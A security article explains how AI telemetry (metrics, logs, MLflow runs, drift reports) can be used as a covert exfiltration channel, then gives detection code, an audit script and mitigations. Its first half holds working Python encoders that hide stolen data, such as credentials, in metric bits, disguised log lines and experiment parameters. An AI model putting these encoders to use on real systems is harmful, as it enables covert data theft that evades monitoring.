Exfiltrating Data Through AI Telemetry and Logging
Using AI system telemetry, logging pipelines, and observability infrastructure as covert channels for data exfiltration
Overview
AI systems produce extraordinary volumes of telemetry data. Training jobs emit metrics every few seconds — loss values, gradient norms, learning rates, evaluation scores. Inference endpoints log request latencies, token counts, model confidence scores, and sometimes complete request/response pairs. Model monitoring systems track prediction distributions, data drift statistics, and feature importance scores. Experiment tracking platforms store hyperparameters, code snapshots, and artifact references. All of this telemetry flows through logging pipelines, metric collectors, tracing systems, and monitoring dashboards that are designed to be highly available and broadly accessible to engineering teams.
This telemetry infrastructure represents a significant and often overlooked exfiltration channel. An attacker who has compromised a component within the AI pipeline — a training script, a model handler, a preprocessing service — can encode sensitive data within telemetry emissions that flow through standard monitoring infrastructure to locations the attacker can access. Because telemetry is expected to contain numerical values, text strings, and structured metadata, encoded exfiltration data blends naturally with legitimate telemetry, making detection difficult.
The AI-specific dimension of this threat is that AI systems routinely emit high-dimensional numerical data (embedding vectors, attention weights, gradient values, prediction probabilities) that can carry substantial information bandwidth while appearing completely normal to monitoring systems. A model that emits a 768-dimensional embedding vector as part of its standard monitoring telemetry is transmitting 768 floating-point values per inference call — enough to encode significant amounts of stolen data in the least-significant bits without visibly altering the metrics.
This article examines how AI telemetry systems can be weaponized for data exfiltration, demonstrates practical encoding techniques, and provides detection and prevention strategies.
AI Telemetry as Exfiltration Channels
Taxonomy of AI Telemetry Channels
AI systems emit telemetry through multiple channels, each with different bandwidth, accessibility, and detection risk:
| Channel | Bandwidth | Access Pattern | Detection Difficulty |
|---|---|---|---|
| Prometheus metrics | Low (numerical scalars) | Pull-based, broadly accessible | Medium |
| Structured logs (JSON) | High (arbitrary strings) | Push to log aggregator | Low (if monitoring exists) |
| Distributed traces (Jaeger/Zipkin) | Medium (span attributes) | Push to trace collector | High |
| Experiment tracking (MLflow/W&B) | Very high (artifacts, params) | Push to tracking server | High |
| Model monitoring (drift/performance) | Medium (distributions, stats) | Push to monitoring system | Very high |
| Inference response metadata | Medium (headers, metadata) | Returned to client | Low |
| Custom metrics/events | Variable | Push to various sinks | Depends on monitoring |
Channel Characteristics for Exfiltration
Prometheus metrics are scraped at regular intervals (typically 15-30 seconds) and stored in time-series databases. Custom metrics emitted by AI services are expected and rarely scrutinized for content. An attacker can encode data in metric labels (key-value string pairs) or in the metric values themselves. The bandwidth is limited by scrape frequency and the number of metrics, but the channel is persistent and reliable.
Structured logs offer the highest bandwidth because log messages can contain arbitrary text and are routinely long (especially for AI systems that log model outputs, error traces, and debugging information). Log aggregation systems (Elasticsearch, CloudWatch Logs, Datadog) ingest these without content-level analysis.
Distributed traces carry span attributes that can contain key-value metadata. AI inference pipelines generate complex trace trees with many spans, each potentially carrying exfiltration payload in its attributes.
Experiment tracking systems like MLflow and Weights & Biases are designed to store arbitrary parameters, metrics, and artifacts. An attacker with access to log experiments can store stolen data as "experiment parameters" or "model artifacts" that appear as routine ML experiment data.
Encoding Techniques
Steganographic Encoding in Metrics
"""
Demonstrate data encoding in AI telemetry metrics.
Shows how sensitive data can be hidden in normal-looking
model performance metrics.
WARNING: For educational and authorized testing purposes only.
"""
import struct
import math
from typing import Optional
class MetricSteganography:
"""
Encode arbitrary data in AI metric values using
least-significant bit encoding in floating-point numbers.
"""
@staticmethod
def encode_in_float(
legitimate_value: float,
data_byte: int,
bits_to_use: int = 8,
) -> float:
"""
Encode a byte of data in the least significant bits
of a float64 value.
The modification is imperceptible: for a metric value
of 0.9234, encoding a full byte changes the value by
less than 1e-14, which is below any reasonable monitoring
threshold.
"""
# Convert float to its 64-bit integer representation
float_bytes = struct.pack('>d', legitimate_value)
int_repr = struct.unpack('>Q', float_bytes)[0]
# Clear the LSBs we'll use for data
mask = ~((1 << bits_to_use) - 1)
int_repr = (int_repr & mask) | (data_byte & ((1 << bits_to_use) - 1))
# Convert back to float
new_bytes = struct.pack('>Q', int_repr)
return struct.unpack('>d', new_bytes)[0]
@staticmethod
def decode_from_float(
encoded_value: float,
bits_to_use: int = 8,
) -> int:
"""Extract the encoded byte from a float64 value."""
float_bytes = struct.pack('>d', encoded_value)
int_repr = struct.unpack('>Q', float_bytes)[0]
return int_repr & ((1 << bits_to_use) - 1)
@staticmethod
def encode_in_metric_series(
legitimate_metrics: list[float],
data: bytes,
bits_per_value: int = 8,
) -> list[float]:
"""
Encode arbitrary data across a series of metric values.
Each float carries one byte (8 bits) of payload.
A model that emits 100 metrics per scrape (loss, accuracy,
per-class scores, latencies, etc.) can exfiltrate 100 bytes
per scrape interval. At 15-second scrape intervals, this is
~24 KB/hour — enough to exfiltrate API keys, credentials,
or training data samples.
"""
if len(data) > len(legitimate_metrics):
raise ValueError(
f"Data ({len(data)} bytes) exceeds available metrics "
f"({len(legitimate_metrics)})"
)
encoded = list(legitimate_metrics) # Copy
for i, byte_val in enumerate(data):
encoded[i] = MetricSteganography.encode_in_float(
legitimate_metrics[i], byte_val, bits_per_value,
)
return encoded
@staticmethod
def decode_from_metric_series(
encoded_metrics: list[float],
num_bytes: int,
bits_per_value: int = 8,
) -> bytes:
"""Decode data from a series of encoded metrics."""
result = bytearray()
for i in range(num_bytes):
byte_val = MetricSteganography.decode_from_float(
encoded_metrics[i], bits_per_value,
)
result.append(byte_val)
return bytes(result)
class LabelEncodedExfiltration:
"""
Encode data in Prometheus metric labels.
Labels appear as metadata on metrics and can contain
arbitrary strings that look like normal operational data.
"""
# Cover labels that blend with AI metrics
COVER_LABELS = [
"model_version", "experiment_id", "run_id",
"batch_id", "checkpoint_hash", "data_split",
"feature_set", "pipeline_stage", "cluster_id",
]
@staticmethod
def encode_in_labels(
data: bytes,
chunk_size: int = 16,
) -> list[dict[str, str]]:
"""
Encode data as metric label values that resemble
legitimate ML experiment identifiers.
"""
import base64
encoded = base64.b32encode(data).decode().rstrip("=").lower()
chunks = [
encoded[i:i + chunk_size]
for i in range(0, len(encoded), chunk_size)
]
labels = []
for i, chunk in enumerate(chunks):
# Format as a realistic-looking identifier
label_name = LabelEncodedExfiltration.COVER_LABELS[
i % len(LabelEncodedExfiltration.COVER_LABELS)
]
# Prefix with a plausible format
label_value = f"v{i:02d}-{chunk}"
labels.append({label_name: label_value})
return labels
@staticmethod
def decode_from_labels(
labels: list[dict[str, str]],
) -> bytes:
"""Decode data from metric labels."""
import base64
chunks = []
for label_dict in labels:
for _key, value in label_dict.items():
# Strip the prefix
_, _, chunk = value.partition("-")
chunks.append(chunk)
encoded = "".join(chunks).upper()
# Add back base32 padding
padding = (8 - len(encoded) % 8) % 8
encoded += "=" * padding
return base64.b32decode(encoded)Exfiltration Through Inference Logging
Many AI deployments log inference requests and responses for monitoring, debugging, and compliance. These logs are stored in centralized logging systems (Elasticsearch, CloudWatch, Splunk) that may have different access controls than the source data. An attacker who can influence what gets logged can route sensitive data through the logging pipeline.
"""
Demonstrate exfiltration through AI inference logging systems.
A compromised model handler can encode stolen data in log messages
that appear as normal inference logging.
"""
import json
import logging
import hashlib
import base64
from typing import Any, Optional
class InferenceLogExfiltrator:
"""
Exfiltrate data through inference log messages that appear
as legitimate model monitoring output.
"""
def __init__(self, logger: Optional[logging.Logger] = None):
self.logger = logger or logging.getLogger("model.inference")
def exfiltrate_via_debug_logs(
self,
data: bytes,
cover_input: str = "sample input",
) -> None:
"""
Encode data in debug log messages that look like normal
model debugging output.
Log messages like these are expected from ML services:
- "Tokenizer output: [101, 2023, 2003, ...]"
- "Attention weights: [0.234, 0.567, ...]"
- "Cache key: a1b2c3d4e5f6..."
"""
encoded = base64.b64encode(data).decode()
# Split into chunks and log as various debug fields
chunk_size = 64
chunks = [
encoded[i:i + chunk_size]
for i in range(0, len(encoded), chunk_size)
]
for i, chunk in enumerate(chunks):
# Disguise as cache key / hash
self.logger.debug(
"KV cache state: partition=%d key=%s entries=%d",
i, chunk, len(chunk),
)
def exfiltrate_via_metrics_log(
self,
data: bytes,
model_name: str = "production-v3",
) -> None:
"""
Encode data in structured metric log entries.
These look like standard model performance metrics.
"""
# Convert data bytes to float values that look like metrics
float_values = []
for byte_val in data:
# Map byte (0-255) to a plausible metric range
# e.g., latency: 10-250ms, accuracy: 0.85-0.99
float_values.append(byte_val / 255.0 * 0.14 + 0.85)
# Log as structured metrics
metrics_entry = {
"model": model_name,
"timestamp": "2026-03-21T10:30:00Z",
"metrics": {
"per_class_accuracy": float_values[:10],
"per_class_precision": float_values[10:20],
"per_class_recall": float_values[20:30],
"feature_importance": float_values[30:],
},
"metadata": {
"eval_dataset": "validation_v12",
"num_samples": 10000,
},
}
self.logger.info(
"Model evaluation metrics: %s",
json.dumps(metrics_entry),
)
def exfiltrate_via_error_logs(
self,
data: bytes,
cover_error: str = "Tokenization warning",
) -> None:
"""
Encode data in error/warning log stack traces.
Stack traces contain file paths, line numbers, and
variable values that can carry encoded data.
"""
encoded = base64.b85encode(data).decode()
# Create a realistic-looking warning with encoded data
fake_trace = (
f"WARNING: {cover_error} in batch processing\n"
f" File \"/opt/model/preprocessor.py\", line 234\n"
f" Token mapping cache: {encoded[:40]}\n"
f" Fallback tokenization for sequence hash: {encoded[40:]}\n"
f" Processing continued with degraded performance"
)
self.logger.warning(fake_trace)
class ExperimentTrackingExfiltrator:
"""
Exfiltrate data through ML experiment tracking systems
(MLflow, Weights & Biases, etc.).
"""
def __init__(self, tracking_uri: str):
self.tracking_uri = tracking_uri
def exfiltrate_as_hyperparameters(
self,
data: bytes,
experiment_name: str = "hyperparam-sweep-042",
) -> None:
"""
Encode stolen data as hyperparameters in an experiment run.
Hyperparameters are arbitrary key-value pairs that are
expected to contain diverse values.
"""
import requests
# Create an experiment run
resp = requests.post(
f"{self.tracking_uri}/api/2.0/mlflow/runs/create",
json={
"experiment_id": "0",
"run_name": experiment_name,
},
)
if resp.status_code != 200:
return
run_id = resp.json().get("run", {}).get("info", {}).get("run_id")
if not run_id:
return
# Encode data as hyperparameters
encoded = base64.b64encode(data).decode()
chunk_size = 250 # MLflow param value limit
param_names = [
"embedding_dim", "attention_heads", "ff_multiplier",
"dropout_schedule", "warmup_config", "lr_schedule_params",
"regularization_config", "data_augmentation_seed",
"tokenizer_config_hash", "model_init_seed",
]
for i, start in enumerate(range(0, len(encoded), chunk_size)):
chunk = encoded[start:start + chunk_size]
param_name = param_names[i % len(param_names)]
if i >= len(param_names):
param_name = f"{param_name}_{i // len(param_names)}"
requests.post(
f"{self.tracking_uri}/api/2.0/mlflow/runs/log-parameter",
json={
"run_id": run_id,
"key": param_name,
"value": chunk,
},
)
def exfiltrate_as_artifact(
self,
data: bytes,
artifact_name: str = "model_config.json",
) -> None:
"""
Store stolen data as a model artifact.
Artifacts are binary blobs that can contain anything —
they're designed for storing model files.
"""
import requests
import tempfile
import os
# Write data to a temporary file
with tempfile.NamedTemporaryFile(
delete=False, suffix=".bin"
) as tmp:
tmp.write(data)
tmp_path = tmp.name
try:
# Create a run and log the artifact
resp = requests.post(
f"{self.tracking_uri}/api/2.0/mlflow/runs/create",
json={"experiment_id": "0", "run_name": "config-export"},
)
if resp.status_code == 200:
run_id = resp.json()["run"]["info"]["run_id"]
# Log artifact via MLflow client API
# (simplified; actual implementation uses mlflow client)
print(
f"Would log artifact {artifact_name} to run {run_id}"
)
finally:
os.unlink(tmp_path)Exfiltration Through Model Monitoring Systems
Model monitoring systems track prediction distributions, data drift, and feature statistics. These systems process high-dimensional numerical data that provides excellent cover for encoded information:
"""
Exfiltration through model monitoring data drift reports.
Data drift statistics are high-dimensional numerical summaries
that naturally carry enough information to hide exfiltration.
"""
import numpy as np
from typing import Any
class DriftMonitorExfiltrator:
"""
Encode data in model monitoring drift statistics.
Drift reports contain per-feature statistical summaries
that provide high bandwidth for steganographic encoding.
"""
@staticmethod
def encode_in_drift_report(
legitimate_drift: dict[str, float],
data: bytes,
) -> dict[str, float]:
"""
Encode data bytes into the least-significant digits
of drift statistics. A drift report with 100 features
can carry 100 bytes per report.
"""
encoded_drift = dict(legitimate_drift)
feature_names = list(encoded_drift.keys())
for i, byte_val in enumerate(data):
if i >= len(feature_names):
break
feature = feature_names[i]
original = encoded_drift[feature]
# Encode byte in the 7th-8th decimal places
# Drift values like 0.0234 become 0.023400XX
# where XX encodes the byte value
scale = 1e-6
encoded_drift[feature] = original + (byte_val * scale)
return encoded_drift
@staticmethod
def create_cover_drift_report(
num_features: int = 256,
) -> dict[str, float]:
"""
Generate a realistic-looking drift report that serves
as cover for encoded data.
"""
feature_names = [f"feature_{i:03d}" for i in range(num_features)]
np.random.seed(42)
drift = {}
for name in feature_names:
# Realistic PSI (Population Stability Index) values
# Most features have low drift, some have moderate
if np.random.random() < 0.9:
drift[name] = np.random.exponential(0.01) # Low drift
else:
drift[name] = np.random.exponential(0.1) # Moderate drift
return drift
@staticmethod
def decode_from_drift_report(
encoded_drift: dict[str, float],
original_drift: dict[str, float],
num_bytes: int,
) -> bytes:
"""Decode data from drift report by comparing with original."""
feature_names = list(encoded_drift.keys())
result = bytearray()
for i in range(num_bytes):
if i >= len(feature_names):
break
feature = feature_names[i]
diff = encoded_drift[feature] - original_drift[feature]
byte_val = round(diff / 1e-6)
result.append(max(0, min(255, byte_val)))
return bytes(result)Practical Examples
Detecting Telemetry Exfiltration
"""
Detection framework for telemetry-based data exfiltration
in AI systems. Monitors for anomalous patterns in metrics,
logs, and traces that may indicate encoded data.
"""
import math
import json
from collections import Counter
from typing import Optional
class TelemetryExfiltrationDetector:
"""
Detect potential data exfiltration through AI telemetry channels.
Uses statistical analysis to identify encoded data in metrics
and structured patterns in log messages.
"""
def __init__(self):
self.findings: list[dict] = []
def analyze_metric_entropy(
self,
metric_name: str,
values: list[float],
threshold: float = 0.7,
) -> Optional[dict]:
"""
Analyze the entropy of least-significant bits in metric values.
Legitimate metrics have low LSB entropy (correlated with the
overall value). Encoded data produces high LSB entropy.
"""
if len(values) < 100:
return None
import struct
# Extract LSBs from each float
lsb_bytes = []
for val in values:
float_bytes = struct.pack('>d', val)
int_repr = struct.unpack('>Q', float_bytes)[0]
lsb = int_repr & 0xFF
lsb_bytes.append(lsb)
# Calculate byte entropy of LSBs
counts = Counter(lsb_bytes)
total = len(lsb_bytes)
entropy = -sum(
(c / total) * math.log2(c / total)
for c in counts.values()
if c > 0
)
max_entropy = 8.0 # Maximum for 256 possible byte values
normalized_entropy = entropy / max_entropy
if normalized_entropy > threshold:
finding = {
"severity": "HIGH",
"channel": "metrics",
"metric": metric_name,
"detail": (
f"LSB entropy: {normalized_entropy:.3f} "
f"(threshold: {threshold}). High entropy in "
f"least-significant bits suggests steganographic "
f"encoding. Normal metrics typically have LSB "
f"entropy < {threshold}."
),
"sample_size": len(values),
}
self.findings.append(finding)
return finding
return None
def analyze_log_patterns(
self,
log_messages: list[str],
base64_threshold: float = 0.3,
) -> list[dict]:
"""
Detect potential encoded data in log messages.
Checks for unusual character distributions, base64 patterns,
and abnormal message entropy.
"""
findings = []
import re
base64_pattern = re.compile(
r'[A-Za-z0-9+/]{20,}={0,2}'
)
hex_pattern = re.compile(
r'[0-9a-f]{32,}'
)
for i, msg in enumerate(log_messages):
# Check for embedded base64
b64_matches = base64_pattern.findall(msg)
total_b64_chars = sum(len(m) for m in b64_matches)
b64_ratio = total_b64_chars / max(len(msg), 1)
if b64_ratio > base64_threshold:
findings.append({
"severity": "MEDIUM",
"channel": "logs",
"line": i,
"detail": (
f"Log message contains {b64_ratio:.0%} "
f"base64-like content. This may be encoded "
f"exfiltration data."
),
"sample": msg[:200],
})
# Check for long hex strings (potential encoded data)
hex_matches = hex_pattern.findall(msg.lower())
for match in hex_matches:
if len(match) > 64:
findings.append({
"severity": "LOW",
"channel": "logs",
"line": i,
"detail": (
f"Long hex string ({len(match)} chars). "
f"Could be a hash or encoded data."
),
})
self.findings.extend(findings)
return findings
def analyze_experiment_params(
self,
params: dict[str, str],
max_param_length: int = 100,
entropy_threshold: float = 4.0,
) -> list[dict]:
"""
Detect potential exfiltration through experiment parameters.
Legitimate hyperparameters are typically short and have
low entropy. Encoded data is longer and higher entropy.
"""
findings = []
for key, value in params.items():
if len(value) > max_param_length:
# Calculate character entropy
counts = Counter(value)
total = len(value)
entropy = -sum(
(c / total) * math.log2(c / total)
for c in counts.values()
if c > 0
)
if entropy > entropy_threshold:
findings.append({
"severity": "HIGH",
"channel": "experiment_tracking",
"param_key": key,
"detail": (
f"Parameter '{key}' has length {len(value)} "
f"and entropy {entropy:.2f} bits/char. "
f"This exceeds thresholds for normal "
f"hyperparameters and may contain encoded data."
),
})
self.findings.extend(findings)
return findings
def get_findings(self) -> list[dict]:
"""Return all detection findings."""
return self.findingsComprehensive Telemetry Audit Script
#!/usr/bin/env bash
# Audit AI telemetry systems for exfiltration risk
echo "=== AI Telemetry Exfiltration Risk Audit ==="
NAMESPACE="${1:-ai-platform}"
echo ""
echo "--- 1. Log Volume Analysis ---"
# Check for unusual log volume from AI services
kubectl logs --prefix --timestamps -n "$NAMESPACE" --since=1h --tail=0 2>/dev/null \
| wc -l | xargs -I{} echo "Total log lines in past hour: {}"
echo ""
echo "--- 2. Prometheus Metric Cardinality ---"
# High metric cardinality can indicate label-based exfiltration
PROM_URL=$(kubectl get svc -n monitoring prometheus-server \
-o jsonpath='{.spec.clusterIP}' 2>/dev/null)
if [ -n "$PROM_URL" ]; then
echo "Checking metric cardinality..."
curl -s "http://${PROM_URL}:9090/api/v1/label/__name__/values" 2>/dev/null \
| python3 -c "
import sys, json
data = json.load(sys.stdin)
metrics = data.get('data', [])
ai_metrics = [m for m in metrics if any(
t in m.lower() for t in ['model', 'inference', 'training', 'gpu', 'ml_']
)]
print(f'Total metrics: {len(metrics)}')
print(f'AI-related metrics: {len(ai_metrics)}')
if len(ai_metrics) > 500:
print('[WARN] High number of AI metrics may indicate exfiltration')
for m in ai_metrics[:10]:
print(f' {m}')
" 2>/dev/null
fi
echo ""
echo "--- 3. MLflow Experiment Check ---"
MLFLOW_URL=$(kubectl get svc -n "$NAMESPACE" mlflow \
-o jsonpath='{.spec.clusterIP}' 2>/dev/null)
if [ -n "$MLFLOW_URL" ]; then
echo "Checking MLflow for suspicious experiments..."
curl -s "http://${MLFLOW_URL}:5000/api/2.0/mlflow/experiments/search?max_results=100" 2>/dev/null \
| python3 -c "
import sys, json
data = json.load(sys.stdin)
for exp in data.get('experiments', []):
name = exp.get('name', '?')
artifact_loc = exp.get('artifact_location', '?')
print(f' Experiment: {name} -> {artifact_loc}')
" 2>/dev/null
fi
echo ""
echo "--- 4. Service Egress Check ---"
# Check for services with unrestricted egress (exfiltration path)
kubectl get networkpolicies -n "$NAMESPACE" -o json 2>/dev/null \
| python3 -c "
import sys, json
data = json.load(sys.stdin)
policies = data.get('items', [])
has_egress_deny = any(
'Egress' in p.get('spec', {}).get('policyTypes', [])
for p in policies
)
if not has_egress_deny:
print('[WARN] No egress NetworkPolicy - services can send data anywhere')
else:
print('[OK] Egress policies exist')
for p in policies:
if 'Egress' in p.get('spec', {}).get('policyTypes', []):
print(f' Policy: {p[\"metadata\"][\"name\"]}')
" 2>/dev/null
echo ""
echo "=== Audit Complete ==="Defense and Mitigation
Log content analysis: Deploy log analysis rules that detect high-entropy strings, unusual base64 content, and anomalous log message lengths. Tools like Falco can be configured with custom rules for AI-specific log patterns. Machine learning-based anomaly detection on log content can identify encoded data that simple pattern matching misses.
Metric cardinality monitoring: Alert on sudden increases in metric cardinality (new label values or new metric names). Label-based exfiltration creates new time series that should be detectable by monitoring the total time series count.
Egress filtering: Implement strict network egress policies for AI workloads. Telemetry should flow only to authorized collection endpoints (Prometheus, Elasticsearch, MLflow). Block all other outbound connections to prevent direct exfiltration.
Telemetry data classification: Treat AI telemetry as potentially sensitive data. Apply the same access controls and retention policies to inference logs, model metrics, and experiment tracking data as you would to the training data and models themselves.
Least-privilege telemetry: AI services should emit only the telemetry they need for operational purposes. Remove debug logging from production, limit the dimensions of emitted metrics, and avoid logging complete inference inputs/outputs unless required for compliance.
Telemetry pipeline integrity: Secure the telemetry pipeline itself (Prometheus, Fluentd, Elasticsearch) against unauthorized writes. An attacker who can inject telemetry from outside the legitimate pipeline can use it as a data exfiltration channel.
Experiment tracking access control: Implement authentication and RBAC for experiment tracking systems. Restrict who can create experiments, log parameters, and upload artifacts. Audit experiment creation patterns for anomalies.
Canary tokens in telemetry: Deploy canary values in telemetry systems — synthetic metric series and log patterns that should never appear in legitimate telemetry. If these canary values are modified, replicated to unexpected locations, or appear in attacker-controlled systems, it indicates that the telemetry pipeline has been compromised or is being used for exfiltration. This is analogous to honeypots but applied to the observability layer.
Rate limiting telemetry emission: Implement rate limits on the volume of custom metrics, log messages, and trace spans that any single AI service can emit. A compromised service attempting to exfiltrate data through telemetry will generate significantly more telemetry volume than normal operations. Alert on services that exceed their expected telemetry emission rate, particularly for high-entropy content that may indicate encoded data.
References
- MITRE ATT&CK. "Exfiltration Over Alternative Protocol." T1048. https://attack.mitre.org/techniques/T1048/
- MITRE ATLAS. "Exfiltration via ML Inference API." https://atlas.mitre.org/techniques/AML.T0024
- Falco. (2024). "Runtime Security for Containers and Kubernetes." https://falco.org/
- NIST. (2023). "AI Risk Management Framework (AI RMF 1.0)." https://airc.nist.gov/AI_RMF_Interactivity/
- Carlini, N., et al. (2021). "Extracting Training Data from Large Language Models." USENIX Security. https://www.usenix.org/conference/usenixsecurity21/presentation/carlini-extracting